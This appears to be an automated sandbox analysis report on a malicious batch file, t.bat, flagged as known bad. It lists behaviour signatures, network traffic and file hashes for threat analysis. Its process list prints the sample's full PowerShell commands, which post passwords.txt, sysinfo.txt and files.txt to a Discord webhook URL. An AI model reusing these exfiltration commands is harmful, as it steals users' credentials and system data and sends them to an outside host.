Analysis Overview
SHA256
3a138a295230f132721473e396032bdd250158b6a1e45323cc520f5fe7985978
Threat Level: Known bad
The file t.bat was found to be: Known bad.
Malicious Activity Summary
HawkEye
Blocklisted process makes network request
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Gathers system information
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2023-11-13 21:21
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-13 21:21
Reported
2023-11-13 21:23
Platform
win10v2004-20231020-en
Max time kernel
74s
Max time network
69s
Command Line
Signatures
HawkEye
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3308 wrote to memory of 1040 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3308 wrote to memory of 1040 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3308 wrote to memory of 3736 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\systeminfo.exe |
| PID 3308 wrote to memory of 3736 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\systeminfo.exe |
| PID 3308 wrote to memory of 3948 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3308 wrote to memory of 3948 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3308 wrote to memory of 3916 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3308 wrote to memory of 3916 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\t.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1173685735228985494/03JreB4JsfBMfEb-HRffc4smZ19x0KflJwBN4LO5qPB73n0cAHJbBYg6O6IWmkmLS08_' -Method POST -Body @{content=(Get-Content passwords.txt)}"
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1173685735228985494/03JreB4JsfBMfEb-HRffc4smZ19x0KflJwBN4LO5qPB73n0cAHJbBYg6O6IWmkmLS08_' -Method POST -Body @{content=(Get-Content sysinfo.txt)}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1173685735228985494/03JreB4JsfBMfEb-HRffc4smZ19x0KflJwBN4LO5qPB73n0cAHJbBYg6O6IWmkmLS08_' -Method POST -Body @{content=(Get-Content files.txt)}"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 8.144.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.194.73.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.240.110.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.109.26.67.in-addr.arpa | udp |
Files
memory/1040-11-0x000002D359AE0000-0x000002D359B02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ejj2rgeb.ncq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1040-16-0x00007FF86B010000-0x00007FF86BAD1000-memory.dmp
memory/1040-17-0x000002D341360000-0x000002D341370000-memory.dmp
memory/1040-18-0x000002D341360000-0x000002D341370000-memory.dmp
memory/1040-19-0x000002D341360000-0x000002D341370000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\passwords.txt
| MD5 | 53b0ead48140091a196fafb6b8c5bb3c |
| SHA1 | c6862512054f2de22087bfe539b9fa18e97db214 |
| SHA256 | 57a3befee8f64369c40dfe1fb0b6df5792c8b68381e60d786b7432fb2a3cf662 |
| SHA512 | 4f8e6514ea92ab08d950d2a00448f5f08f46d48112c632e0fcc504f7ea232b08f49db505751d949064df13a20a50e149034b78a17f45cd308fec1e472f7301cb |
memory/1040-21-0x000002D35A740000-0x000002D35AEE6000-memory.dmp
memory/1040-25-0x00007FF86B010000-0x00007FF86BAD1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8a7f1bbb54d46317b10f8570930f1587 |
| SHA1 | a3622cd5ba47ff63381e1c8459dcdb822ae80b14 |
| SHA256 | 19409fcc9d229fdc1fa59eb1b3beea2e031a76782261e3fdd0af6639f7111cac |
| SHA512 | 9c8c56c205ed32589c9ce80f10fe11986f238a722b3016e50e7677d60f190c7abe2fe445a9bdf2d192d8a9ab4f2e29528d5e179b2dca0c83668c3932858488c4 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3d2dcde2b92ddc1caedbe3dcc9efc114 |
| SHA1 | e149ab0853f59539a6993d1727e7f29834c3a548 |
| SHA256 | 3c598ecbf86eb6c3f992e35bbcd69e354cfb1f9caf0c436cd7acabac111d96c6 |
| SHA512 | 662fd6ec00495373f8fbe821badaacf0c35e27243fd2d640e908ef913a0725f92f2379fc34d42653930463425cd8a290c8981cb658e155f10bc928ce84201ba4 |
memory/3948-38-0x00007FF86ACC0000-0x00007FF86B781000-memory.dmp
memory/3948-40-0x00000267E8AF0000-0x00000267E8B00000-memory.dmp
memory/3948-39-0x00000267E8AF0000-0x00000267E8B00000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\sysinfo.txt
| MD5 | a9812d5ea5001324a17895f4ec2bb47c |
| SHA1 | 054e0b9eedcb1264ace23dbf239818244fdafb4f |
| SHA256 | 8907893d54ea7f5fea57bbca52fdde5d14b6517a0b8e745d78758667b469ae5e |
| SHA512 | 2677628779d1766bb84a736034cf8bbf0bd464adcadf41d1e94b5abfa0174aa7eb3a50d8a93748f7b55378df6ed13fed0cb2ea50d69736faeb146faf6f74c559 |
memory/3948-44-0x00007FF86ACC0000-0x00007FF86B781000-memory.dmp
memory/3916-55-0x00007FF86ACC0000-0x00007FF86B781000-memory.dmp
memory/3916-57-0x0000025177D90000-0x0000025177DA0000-memory.dmp
memory/3916-56-0x0000025177D90000-0x0000025177DA0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 87addc59846b16b4a3c182e16ace9b84 |
| SHA1 | 572ba04171b1f9d893f43f8c72800393b133161a |
| SHA256 | abcdce53e9e05fd1009fa1a97af43f4471b3a408af5e51a1e5baa091a36ae5f0 |
| SHA512 | b5f2214bf9fe99cb9a6eda901b102bb46c9843a398d72154ff6943cec2d53defa9e7026002f80c29ea1ad0de5864aae91e8cb2b9a0426842d0d6299b87d2f18e |
C:\Users\Admin\AppData\Local\Temp\files.txt
| MD5 | f31c3f34c03c7016c72b9355e02bceeb |
| SHA1 | 79ecb50628fef47b8b4518e624de4b241011da32 |
| SHA256 | ab9afd4963e85b01ab48cd37e7ebec4c3e496640a72976e5ec5529f5b92b1f8d |
| SHA512 | abf53be628382272dbb0e75085e36ac1cc0d8c215ac4a27b2d1fe1e8647df03feaa60486a3068eae0d54c1d61256293536f59f335fe4ed55ce479aa5d9ddd679 |
memory/3916-62-0x00007FF86ACC0000-0x00007FF86B781000-memory.dmp